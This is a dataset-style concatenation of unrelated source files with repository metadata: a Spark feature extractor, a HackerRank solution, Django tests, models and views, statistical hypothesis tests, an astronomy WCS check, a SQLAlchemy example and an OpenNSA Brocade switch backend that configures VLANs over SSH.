f[9] = min(1.0,round(1.0*f[3]/f[1],4)) if f[1]!=0 else 0.0 # 最后1周加收转化率
f[10] = min(1.0,round(1.0*f[3]/f[2],4)) if f[2]!=0 else 0.0 # 最后1周加购转化率
f[11] = min(1.0,round(1.0*f[7]/f[4],4)) if f[4]!=0 else 0.0 # 最后3周点击转化率
f[12] = min(1.0,round(1.0*f[7]/f[5],4)) if f[5]!=0 else 0.0 # 最后3周加收转化率
f[13] = min(1.0,round(1.0*f[7]/f[6],4)) if f[6]!=0 else 0.0 # 最后3周加购转化率
f[14] = last # 最后一次购买距离天数
f[15] = len(set([item[0] for item in items if item[0]<=3])) # 最后3天内交互天数
f[16] = len(set([item[0] for item in items if item[0]<=7])) # 最后1周内交互天数
f[17] = len(set([item[0] for item in items if item[0]<=21])) # 最后3周内交互天数
f[18] = items[-1][0] if len(items)!=0 else inf # 最后1次交互距离天数
inter = [len(list(i)) for _,i in itertools.groupby(items, lambda x: x[0])]
f[19] = len(inter) #交互天数
f[20] = max(inter) if len(inter)!=0 else 0 #交互最多的一天交互次数
f[21] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # 最后1天购买次数
f[22] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # 最后3天购买次数
f[23] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # 最后7天购买次数
f[38] = round(1.0*len(items)/f[32],4) if f[32]!=0 else 0.0 # 用户对每件商品的平均交互次数
return "\t".join([str(i) for i in f])
global etime
global subset
if __name__ == "__main__":
import fileinput
conf = (SparkConf()
.setMaster("spark://namenode.omnilab.sjtu.edu.cn:7077")
.setAppName("Extract")
.set("spark.cores.max", "32")
.set("spark.driver.memory", "4g")
.set("spark.executor.memory", "6g"))
sc = SparkContext(conf = conf)
lines = sc.textFile('hdfs://namenode.omnilab.sjtu.edu.cn/user/qiangsiwei/competition_tianchi/uid_iid', 1)
target, etime, subset = "12-19-0", "12-18-23", {}
# target, etime, subset = "12-18-0", "12-17-23", {}
# target, etime, subset = "12-17-0", "12-16-23", {}
# target, etime, subset = "12-16-0", "12-15-23", {}
# target, etime, subset = "12-15-0", "12-14-23", {}
# target, etime, subset = "12-14-0", "12-13-23", {}
# target, etime, subset = "12-13-0", "12-12-23", {}
# target, etime, subset = "12-12-0", "12-11-23", {}
# target, etime, subset = "12-11-0", "12-10-23", {}
# target, etime, subset = "12-10-0", "12-09-23", {}
# target, etime, subset = "12-09-0", "12-08-23", {}
# target, etime, subset = "12-08-0", "12-07-23", {}
# target, etime, subset = "12-07-0", "12-06-23", {}
# target, etime, subset = "12-06-0", "12-05-23", {}
# target, etime, subset = "12-05-0", "12-04-23", {}
# target, etime, subset = "12-04-0", "12-03-23", {}
# target, etime, subset = "12-03-0", "12-04-23", {}
# target, etime, subset = "12-02-0", "12-01-23", {}
# target, etime, subset = "12-01-0", "11-30-23", {}
for line in fileinput.input("./tianchi_mobile_recommend_train_item.csv"):
subset[line.split(",")[0]] = True
counts = lines.map(lambda x : extract1(x))\
.groupByKey()\
.map(lambda x : x[0]+"\t"+extract2(x[1]))
output = counts.saveAsTextFile("./competition_tianchi/feature/"+target+"/user/")
|
[
"mqiang@splunk.com"
] |
mqiang@splunk.com
|
479a840a61ac23a2b6d04a1d92edc8556addd410
|
f5ca706ea5fd000ebdd230b4c828d98540009b85
|
/Problem Solving/Strings/Funny String.py
|
14b5568074ebb390445b514074806155920e1755
|
[] |
no_license
|
xtanmaygarg/HackerRankSolutions
|
a6fc72dcd165197c268d28d3f41bd022b5983b8b
|
ce973b9b1f90e7e39092ecc988333904afb0cda5
|
refs/heads/master
| 2021-01-01T08:57:24.586457
| 2020-07-12T21:04:57
| 2020-07-12T21:04:57
| 239,206,459
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the funnyString function below.
def funnyString(s):
t = s[::-1]
s = list(s)
t = list(t)
sl = []
tl = []
fl = []
gl = []
for i in s:
sl.append(ord(i))
for i in t:
tl.append(ord(i))
for i in range(0,len(sl)-1):
fl.append(abs(sl[i+1] - sl[i]))
for i in range(0,len(tl)-1):
gl.append(abs(tl[i+1] - tl[i]))
#print(gl)
print(fl)
if fl == gl:
return "Funny"
else:
return "Not Funny"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
s = input()
result = funnyString(s)
fptr.write(result + '\n')
fptr.close()
|
[
"xtanmaygarg@gmail.com"
] |
xtanmaygarg@gmail.com
|
48ff9ba9d3dbeab6f4e525a151aa67190e43cc72
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/nistData/atomic/double/Schema+Instance/NISTXML-SV-IV-atomic-double-enumeration-2-3.py
|
9d0ef3892cc0f445eb1ee3592e91bca8ebbf63df
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917
| 2023-07-29T17:10:13
| 2023-07-30T12:11:13
| 239,622,251
| 2
| 0
|
MIT
| 2023-07-25T14:19:04
| 2020-02-10T21:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 534
|
py
|
from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2
from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2Type
obj = NistschemaSvIvAtomicDoubleEnumeration2(
value=NistschemaSvIvAtomicDoubleEnumeration2Type.VALUE_2_7311892445441031_E36
)
|
[
"tsoulloftas@gmail.com"
] |
tsoulloftas@gmail.com
|
ff2cada24b0e31d5d867122eea1da07532fd6a5a
|
c5347d37f7d8018c2e6161de265ed5ced7deab51
|
/budget/tests/test_views.py
|
192c634a250860c534d8ef233e33ce3c6a002e91
|
[
"MIT"
] |
permissive
|
davidlares/budget-webapp-django-testing
|
db3f1d5f6f90ccc357271cbe02becf31d4d38355
|
330039ba8a34e14afc96050a5cb9494380edbe84
|
refs/heads/master
| 2022-01-12T15:50:53.638288
| 2019-05-10T14:27:05
| 2019-05-10T14:27:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,607
|
py
|
from django.test import TestCase, Client
from django.urls import reverse
from budget.models import Project, Category, Expense
import json
class TestViews(TestCase):
# runs before any test here
def setUp(self):
self.client = Client() # creating a client
self.list_url = reverse('list')
self.detail_url = reverse('detail', args=['desktop-app'])
# creating a object for getting the slug correctly (override save method)
self.desktopapp = Project.objects.create(
name = "Desktop app",
budget = 10000
)
# GET methods
def test_project_list_get(self):
response = self.client.get(self.list_url) # setting up the client
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-list.html')
def test_project_detail_get(self):
response = self.client.get(self.detail_url) # setting up the client
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-detail.html')
# POST methods
def test_project_detail_POST_new_expense(self):
Category.objects.create (
project = self.desktopapp,
name = 'development'
)
response = self.client.post(self.detail_url, {
'title': 'expense1',
'amount': 1000,
'category': 'development'
})
# because the view redirection
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.first().title, 'expense1')
#empty
def test_project_detail_post_no_data(self):
response = self.client.post(self.detail_url)
# because the view redirection
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.count(), 0)
# DELETE methods
def test_project_detail_delete_expense(self):
category1 = Category.objects.create (
project = self.desktopapp,
name = 'development'
)
Expense.objects.create(
project = self.desktopapp,
title = 'expense1',
amount = 1000,
category = category1
)
response = self.client.delete(self.detail_url, json.dumps({
'id': 1
# the created expense ID
}))
# intensional broken = should be 302
self.assertEquals(response.status_code, 204)
self.assertEquals(self.desktopapp.expenses.count(), 0)
|
[
"="
] |
=
|
39880a9d9db55971218551a7facfbd7b50fc34e2
|
2e5936c3877e96d39f52045a403b658be41b2e1e
|
/meanmax/stats/test.py
|
5debe41403987fe96ba9687a5b7bddd067501f6a
|
[
"MIT"
] |
permissive
|
castorini/meanmax
|
32b71c36b39a30107ae288ba9ae815d630c1b4db
|
0ea124105eda04a00677c077b591a94c2e2b2936
|
refs/heads/master
| 2022-05-17T03:31:00.320904
| 2020-04-29T02:27:15
| 2020-04-29T02:27:15
| 258,859,401
| 11
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,951
|
py
|
from dataclasses import dataclass, field
from typing import Any, Dict
from scipy import stats
import numpy as np
from .estimator import QuantileEstimator
from .utils import compute_pr_x_ge_y
from .tables import MANN_WHITNEY_UP010
@dataclass(frozen=True)
class TwoSampleHypothesisTest(object):
options: Dict[str, Any] = field(default_factory=dict)
@property
def name(self):
raise NotImplementedError
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
return self.name == other.name
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
raise NotImplementedError
@dataclass(frozen=True)
class StudentsTTest(TwoSampleHypothesisTest):
@property
def name(self):
if not self.options.get('equal_var'):
return 'Welch\'s t-test'
else:
return 't-test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
t, p = stats.ttest_ind(sample1, sample2, **self.options)
return p / 2 < alpha and t < 0, t, p
@dataclass(frozen=True)
class SDBootstrapTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Stochastic Dominance Bootstrap'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
iters = self.options.get('iters', 1000)
gt = compute_pr_x_ge_y(sample1, sample2)
sample = np.concatenate((sample1, sample2))
n = len(sample1)
stats = []
for _ in range(iters):
np.random.shuffle(sample)
sample1 = sample[:n]
sample2 = sample[n:]
stats.append(compute_pr_x_ge_y(sample1, sample2))
p = np.mean(np.array(stats) <= gt)
return p < alpha, p, p
@dataclass(frozen=True)
class MannWhitneyUTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Mann-Whitney U test'
def __post_init__(self):
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
def exact_test(self, s1, s2):
s1 = [(x, 0) for x in s1]
s2 = [(x, 1) for x in s2]
n = len(s1)
m = len(s2)
s = sorted(s1 + s2)
ranksum1 = 0
ranksum2 = 0
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
last_x = -1000000
for rank, (x, l) in enumerate(s):
if x != last_x and n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
counts[l] += 1
tmp_ranksum += rank + 1
n_ranksum += 1
last_x = x
if n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
U1 = (n * m) + (n * (n + 1)) / 2 - ranksum1
U2 = (n * m) + (m * (m + 1)) / 2 - ranksum2
U = min(U1, U2)
return U, 0.05 if U <= MANN_WHITNEY_UP010[n - 1][m - 1] and ranksum1 < ranksum2 else 0.051
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
if len(sample1) <= 20 or len(sample2) <= 20:
U, p = self.exact_test(sample1, sample2)
else:
U, p = stats.mannwhitneyu(sample1, sample2, **self.options)
return p <= alpha, U, p
@dataclass(frozen=True)
class QuantileTest(TwoSampleHypothesisTest):
def __post_init__(self):
if 'quantile' not in self.options:
self.options['quantile'] = 0.5
if 'bootstrap_samples' not in self.options:
self.options['bootstrap_samples'] = 2000
if 'estimate_method' not in self.options:
self.options['estimate_method'] = 'harrelldavis'
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
@property
def name(self):
if self.options['estimate_method'] == 'harrelldavis':
return 'Harrell-Davis quantile test'
if self.options['estimate_method'] == 'direct':
return 'Direct quantile test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
test = QuantileEstimator(dict(estimate_method=self.options['estimate_method'],
quantile=self.options['quantile']))
dstar_arr = []
b = self.options['bootstrap_samples']
for _ in range(b):
sx = test.estimate_point(np.random.choice(sample1, len(sample1)))
sy = test.estimate_point(np.random.choice(sample2, len(sample2)))
dstar_arr.append(sx - sy)
dstar_arr = np.array(dstar_arr)
pstar = (sum(dstar_arr < 0) + 0.5 * sum(dstar_arr == 0)) / b
if self.options['alternative'] == 'less':
p = 1 - pstar
elif self.options['alternative'] == 'both':
p = 2 * min(pstar, 1 - pstar)
else: # greater
p = pstar
return p < alpha, pstar, p
@dataclass(frozen=True)
class ASDTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Almost Stochastic Dominance test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
tmp = sample2
sample2 = sample1
sample1 = tmp
phi = stats.norm.ppf(alpha)
epsilons = []
n = len(sample1)
m = len(sample2)
c = np.sqrt(n * m / (n + m))
eps_fn = lambda x, y: 1 - compute_pr_x_ge_y(x, y)
eps_orig = eps_fn(sample1, sample2)
for _ in range(1000):
bs1 = np.random.choice(sample1, n)
bs2 = np.random.choice(sample2, m)
epsilons.append(c * (eps_fn(bs1, bs2) - eps_orig))
min_eps = eps_orig - (1 / c) * np.std(epsilons) * phi
return min_eps < self.options.get('threshold', 0.5), min_eps, alpha
|
[
"r33tang@uwaterloo.ca"
] |
r33tang@uwaterloo.ca
|
2a1f653f3c6aa17decf8fe6281e94268b31d7d45
|
588f4991cad99f517ca5028e0e41c5b4d5252543
|
/contest/abc146/A.py
|
6dd0b6d5935a91706c75eddb86e2fa19ed8bb293
|
[
"MIT"
] |
permissive
|
mola1129/atcoder
|
3002ff38cabf0ccb5142bd576ed90419fccde02e
|
1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db
|
refs/heads/master
| 2020-06-16T12:24:49.609707
| 2020-03-14T15:58:42
| 2020-03-14T15:58:42
| 195,571,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
s = input()
week = ['SUN', 'MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT']
for i in range(7):
if s == week[i]:
print(7 - i)
break
|
[
"ms.mola1129@gmail.com"
] |
ms.mola1129@gmail.com
|
c66f88b67107e67c470860ea50ec688511ea496a
|
0010b3d8b8f806d6065e1bb1aa3c18f9714001a7
|
/tests/fits_files/check_pyast_sip.py
|
6bc939935357f3d53094597d1955dba3e9bf7d27
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain"
] |
permissive
|
GalSim-developers/GalSim
|
bfd2d5e57f20874ad81bc735195c5c62efad63eb
|
f1c0319600cc713373f1cea7459171fbf388848e
|
refs/heads/main
| 2023-08-17T07:30:44.583679
| 2023-08-15T02:52:00
| 2023-08-15T02:52:00
| 3,510,804
| 194
| 104
|
NOASSERTION
| 2023-09-12T04:03:38
| 2012-02-22T02:51:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,663
|
py
|
# Copyright (c) 2012-2022 by the GalSim developers team on GitHub
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
# https://github.com/GalSim-developers/GalSim
#
# GalSim is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
#
# This script is featured on pyast issue page:
# https://github.com/timj/starlink-pyast/issues/8
# PyAst had been failing to write SIP files correctly, but they fixed this in
# v3.9.0. We override their claim of success regardless, since they aren't
# necessarily accurate enough for our purposes (only accurate to 0.1 pixels).
# Thus, older PyAst versions work correctly in GalSim.
import starlink.Atl as Atl
import starlink.Ast as Ast
import astropy.io.fits as pyfits
import numpy
# http://fits.gsfc.nasa.gov/registry/sip/sipsample.fits
hdu = pyfits.open('sipsample.fits')[0]
fc = Ast.FitsChan(Atl.PyFITSAdapter(hdu))
wcs = fc.read()
# A random test position. The "true" RA, Dec values are taken from ds9.
x = 242
y = 75
true_ra = (13 + 30/60. + 1.474154/3600. - 24.) * numpy.pi / 12.
true_dec = (47 + 12/60. + 51.794474/3600.) * numpy.pi / 180.
ra1, dec1 = wcs.tran( numpy.array([ [x], [y] ]))
print 'Initial read of sipsample.fits:'
print 'error in ra = ',(ra1-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec1-true_dec) * 180.*3600./numpy.pi, 'arcsec'
# Now cycle through writing and reading to a file
hdu2 = pyfits.PrimaryHDU()
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False), "Encoding=FITS-WCS")
success = fc2.write(wcs)
print 'success = ',success
if not success:
fc2 = Ast.FitsChan(None, Atl.PyFITSAdapter(hdu2, clear=False))
success = fc2.write(wcs)
print 'Native encoding: success = ',success
fc2.writefits()
hdu2.writeto('test_sip.fits', clobber=True)
hdu3 = pyfits.open('test_sip.fits')[0]
fc3 = Ast.FitsChan(Atl.PyFITSAdapter(hdu3))
wcs3 = fc3.read()
ra3, dec3 = wcs3.tran( numpy.array([ [x], [y] ]))
print 'After write/read round trip through fits file:'
print 'error in ra = ',(ra3-true_ra) * 180.*3600./numpy.pi, 'arcsec'
print 'error in dec = ',(dec3-true_dec) * 180.*3600./numpy.pi, 'arcsec'
|
[
"michael@jarvis.net"
] |
michael@jarvis.net
|
59c1f2b45d421f9c798635691acd2b8b721d41ce
|
359f3d8a1a2b5524490c314a44d60cec1d06f658
|
/whoweb/search/migrations/0016_remove_searchexportpage_limit.py
|
a6429e3520d3cf0c0d99c344ac8bb8c2cec16767
|
[] |
no_license
|
sivasuriyangithub/Merket_Intellect-s3.route
|
ec9d9aa7d4575d5ff8006e1454f69e4033193fc0
|
71a9ab642f9a31f4a318cebec7fe6a075870a83c
|
refs/heads/master
| 2023-08-25T13:51:02.116705
| 2021-10-19T01:06:49
| 2021-10-19T01:06:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
# Generated by Django 2.2.8 on 2020-02-10 02:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("search", "0015_auto_20200210_0233"),
]
operations = [
migrations.RemoveField(model_name="searchexportpage", name="limit",),
]
|
[
"zach@whoknows.com"
] |
zach@whoknows.com
|
9ab4170d522046aa76f5bf39f8cae94eaa54c710
|
dd87109f806b31ddd065b51162e4e3ddc167151f
|
/select_sqlalchemy.py
|
1ef7bac6df4eff93502b857a0cf97d7e3f2c2689
|
[] |
no_license
|
articuly/operation_practice
|
9776caeb9a039a72d008fc312b1134f7e2c18394
|
d4d4452e4174e6b8d7cc834f29452c08f304c719
|
refs/heads/master
| 2021-05-26T04:03:12.489849
| 2021-01-26T12:24:35
| 2021-01-26T12:24:35
| 254,045,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 958
|
py
|
from sqlalchemy import create_engine, Column, Integer, String, Enum
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
# 创建数据库引擎,连接mqsql数据库,用pymysql方式
engine = create_engine('mysql+pymysql://root:123456@localhost/mycms')
# 创建会话对象,根据不同的数据库引擎创建对应的会话对象
Session = sessionmaker(bind=engine)
# 创建会话对象实例
session = Session()
# base为映射基类
Base = declarative_base()
# 数据库表模型的映射
class Users(Base):
__tablename__ = 'users'
user_id = Column(Integer, primary_key=True)
username = Column(String(32))
realname = Column(String(32))
password = Column(String(32))
age = Column(Integer)
city = Column(String(32))
if __name__ == '__main__':
res = session.query(Users, Users.username, Users.realname).filter(Users.username.like("py%")).limit(50).all()
print(res)
|
[
"articuly@gmail.com"
] |
articuly@gmail.com
|
3fcd3ecb6a4ec8ef84a4547a9ff3b96cc2bc5142
|
88bd71afeb581578c9c0d29c08b38a9ed1c00ffb
|
/house/views.py
|
7e22d0ac99a0b75f5279554ee7e962e5af0bfc86
|
[] |
no_license
|
lopezjronald/DjangoRealEstateInvestmentProject
|
019b5c763a5839b920a9abf823c9feb1e9fde0f8
|
6347e2a60e48915333700c182bb4143166cfb8f1
|
refs/heads/master
| 2022-12-04T18:38:17.609092
| 2020-08-28T00:50:23
| 2020-08-28T00:50:23
| 290,914,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
from django.shortcuts import render
from .models import Project
def house(request):
projects = Project.objects.all()
return render(request, 'house/home.html', {'projects': projects})
|
[
"lopez.j.ronald@gmail.com"
] |
lopez.j.ronald@gmail.com
|
fa284df700e5a99c1ad7f73156e6a6cfb14a4ef6
|
c61802907bb274c999a6815a072336de977e65e9
|
/opennsa/backends/brocade.py
|
2e9860ec78d9b0f606ca23ee5b8ca96a718d3e9f
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
NORDUnet/opennsa
|
2f8039fa4702a8126e2e0cdc4bc6b56b4389c494
|
9d47b29037e5f9a159e7984eb17b4d3aeaf1708c
|
refs/heads/master
| 2023-07-22T22:36:44.864169
| 2022-10-06T13:18:08
| 2022-10-06T13:18:08
| 10,215,733
| 16
| 24
|
BSD-3-Clause
| 2022-10-06T13:08:44
| 2013-05-22T08:50:54
|
Python
|
UTF-8
|
Python
| false
| false
| 8,035
|
py
|
"""
Brocade backend.
Contributed by Balasubramania Pillai from MAX Gigapop.
Ported to OpenNSA NSIv2 by Henrik Thostrup Jensen (summer 2013)
Further contributions/fixes from Jeronimo Aguiar from AMPATH.
Further contributions by John Hess from CENIC.
Notes:
configure terminal
vlan $vlan_id name $name
tagged $source_port
tagged $dest_port
end
Teardown:
configure terminal
no vlan $vlan_id
end
"""
import string
import random
from twisted.python import log
from twisted.internet import defer
from opennsa import constants as cnt, config
from opennsa.backends.common import ssh, genericbackend
LOG_SYSTEM = 'opennsa.brocade'
COMMAND_PRIVILEGE = 'enable %s'
COMMAND_CONFIGURE = 'configure terminal'
COMMAND_END = 'end'
COMMAND_VLAN = 'vlan %(vlan)i name %(name)s'
#COMMAND_TAGGED = 'tagged %(port)s'
COMMAND_TAGGED = 'tagged ethernet %(port)s'
COMMAND_NO_VLAN = 'no vlan %(vlan)i'
def _portToInterfaceVLAN(nrm_port):
port, vlan = nrm_port.split('.')
vlan = int(vlan)
return port, vlan
def _createSetupCommands(source_nrm_port, dest_nrm_port):
log.msg('_createSetupCommands: src %s dst %s' % (source_nrm_port, dest_nrm_port))
s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
log.msg('_createSetupCommands: src %s %s dst %s %s' % (s_port, s_vlan, d_port, d_vlan))
name = 'opennsa-%i' % s_vlan
cmd_vlan = COMMAND_VLAN % { 'vlan' : s_vlan, 'name' : name }
cmd_s_intf = COMMAND_TAGGED % { 'port' : s_port }
cmd_d_intf = COMMAND_TAGGED % { 'port' : d_port }
commands = [ cmd_vlan, cmd_s_intf, cmd_d_intf ]
log.msg('_createSetupCommands: commands %s' % (commands))
return commands
def _createTeardownCommands(source_nrm_port, dest_nrm_port):
s_port, s_vlan = _portToInterfaceVLAN(source_nrm_port)
d_port, d_vlan = _portToInterfaceVLAN(dest_nrm_port)
assert s_vlan == d_vlan, 'Source and destination VLANs differ, unpossible!'
cmd_no_intf = COMMAND_NO_VLAN % { 'vlan' : s_vlan }
commands = [ cmd_no_intf ]
return commands
class SSHChannel(ssh.SSHChannel):
name = b'session'
def __init__(self, conn):
ssh.SSHChannel.__init__(self, conn=conn)
self.data = b''
self.wait_defer = None
self.wait_data = None
@defer.inlineCallbacks
def sendCommands(self, commands, enable_password):
LT = '\r' # line termination
try:
log.msg('Requesting shell for sending commands', debug=True, system=LOG_SYSTEM)
yield self.conn.sendRequest(self, 'shell', b'', wantReply=1)
d = self.waitForData(b'>')
self.write(COMMAND_PRIVILEGE % enable_password + LT)
yield d
log.msg('Entered privileged mode', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_CONFIGURE + LT)
yield d
log.msg('Entered configure mode', debug=True, system=LOG_SYSTEM)
for cmd in commands:
log.msg('CMD> %s' % cmd, debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(cmd + LT)
yield d
# not quite sure how to handle failure here
log.msg('Commands send, sending end command.', debug=True, system=LOG_SYSTEM)
d = self.waitForData(b'#')
self.write(COMMAND_END + LT)
yield d
except Exception as e:
log.msg('Error sending commands: %s' % str(e))
raise e
log.msg('Commands successfully send', debug=True, system=LOG_SYSTEM)
self.sendEOF()
self.closeIt()
def waitForData(self, data):
self.wait_data = data
self.wait_defer = defer.Deferred()
return self.wait_defer
def dataReceived(self, data):
if len(data) == 0:
pass
else:
self.data += data
if self.wait_data and self.wait_data in self.data:
d = self.wait_defer
self.data = b''
self.wait_data = None
self.wait_defer = None
d.callback(self)
class BrocadeCommandSender:
def __init__(self, host, port, ssh_host_fingerprint, user, ssh_public_key_path, ssh_private_key_path, enable_password):
self.ssh_connection_creator = \
ssh.SSHConnectionCreator(host, port, [ ssh_host_fingerprint ], user, ssh_public_key_path, ssh_private_key_path)
self.enable_password = enable_password
@defer.inlineCallbacks
def sendCommands(self, commands):
# Open a connection for each request
# This is done due to the code being based on the Force10 backend
# It is currently unknown if the Brocade SSH implementation
# supports multiple ssh channels.
log.msg('Creating new SSH connection', debug=True, system=LOG_SYSTEM)
ssh_connection = yield self.ssh_connection_creator.getSSHConnection()
try:
channel = SSHChannel(conn=ssh_connection)
ssh_connection.openChannel(channel)
yield channel.channel_open
yield channel.sendCommands(commands, self.enable_password)
finally:
ssh_connection.transport.loseConnection()
class BrocadeConnectionManager:
def __init__(self, log_system, port_map, cfg):
self.log_system = log_system
self.port_map = port_map
host = cfg[config.BROCADE_HOST]
port = cfg.get(config.BROCADE_PORT, 22)
host_fingerprint = cfg[config.BROCADE_HOST_FINGERPRINT]
user = cfg[config.BROCADE_USER]
ssh_public_key = cfg[config.BROCADE_SSH_PUBLIC_KEY]
ssh_private_key = cfg[config.BROCADE_SSH_PRIVATE_KEY]
enable_password = cfg[config.BROCADE_ENABLE_PASSWORD]
self.command_sender = BrocadeCommandSender(host, port, host_fingerprint, user, ssh_public_key, ssh_private_key, enable_password)
def getResource(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return str(label.labelValue())
def getTarget(self, port, label):
assert label is not None and label.type_ == cnt.ETHERNET_VLAN, 'Label type must be ethernet-vlan'
return self.port_map[port] + '.' + label.labelValue()
def createConnectionId(self, source_target, dest_target):
return 'B-' + ''.join( [ random.choice(string.hexdigits[:16]) for _ in range(10) ] )
def canSwapLabel(self, label_type):
return False
def setupLink(self, connection_id, source_target, dest_target, bandwidth):
def linkUp(pt):
log.msg('Link %s -> %s up' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createSetupCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkUp)
return d
def teardownLink(self, connection_id, source_target, dest_target, bandwidth):
def linkDown(pt):
log.msg('Link %s -> %s down' % (source_target, dest_target), system=self.log_system)
return pt
commands = _createTeardownCommands(source_target, dest_target)
d = self.command_sender.sendCommands(commands)
d.addCallback(linkDown)
return d
def BrocadeBackend(network_name, nrm_ports, parent_requester, configuration):
name = 'Brocade %s' % network_name
nrm_map = dict( [ (p.name, p) for p in nrm_ports ] ) # for the generic backend
port_map = dict( [ (p.name, p.interface) for p in nrm_ports ] ) # for the nrm backend
cm = BrocadeConnectionManager(name, port_map, configuration)
return genericbackend.GenericBackend(network_name, nrm_map, cm, parent_requester, name)
|
[
"htj@nordu.net"
] |
htj@nordu.net
|
fdd4638884d947455012f888f979014d61edaff5
|
8e328e186da6c5bb12c35c72a967ab73be97d6c5
|
/CSMWeb/models.py
|
50a3d4cb6e83c4946df1b2340bafec3794e70140
|
[] |
no_license
|
PaloAltoCSM/CSM
|
48bef57a7db0e623deec60d66e3e5dc4470354e9
|
dd4aaeada040df8e199e9efcea779bef45bbbdb1
|
refs/heads/master
| 2021-01-01T16:30:04.794114
| 2015-08-15T01:46:29
| 2015-08-15T01:46:29
| 40,500,511
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 831
|
py
|
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
class Tag(models.Model):
text = models.CharField(max_length=100, primary_key=True)
def __str__(self):
return "Tag #%s" % (self.text)
class Project(models.Model):
name = models.CharField(max_length=100, primary_key=True)
title = models.CharField(max_length=200, blank=True)
description = models.TextField(blank=True)
members = models.ManyToManyField(User, related_name='projmembers')
followers = models.ManyToManyField(User, related_name='projfollowers')
# tags
tags = models.ManyToManyField(Tag)
def getDict(self):
return {'id': self.id, 'title': self.title, 'description': self.description}
def __unicode__(self):
return "Project #%s" % (self.name)
|
[
"donkimber@gmail.com"
] |
donkimber@gmail.com
|
5a7783237e226747e5fbd25cac84df4b45ef3159
|
4a74875c7366a19b7189fcb89fa0fa27abc4309e
|
/data_pipeline/processor/processor.py
|
b6493e1c2048911a74ea00ba33661a7c5fd2dae6
|
[
"Apache-2.0"
] |
permissive
|
saubury-iag/data_pipeline
|
d865d66d25eeb4ea6c6a655ae934bfe83c0efa06
|
4ad04198ed48c643045113c6e2c3e0848adbdec6
|
refs/heads/master
| 2021-07-23T08:43:46.754162
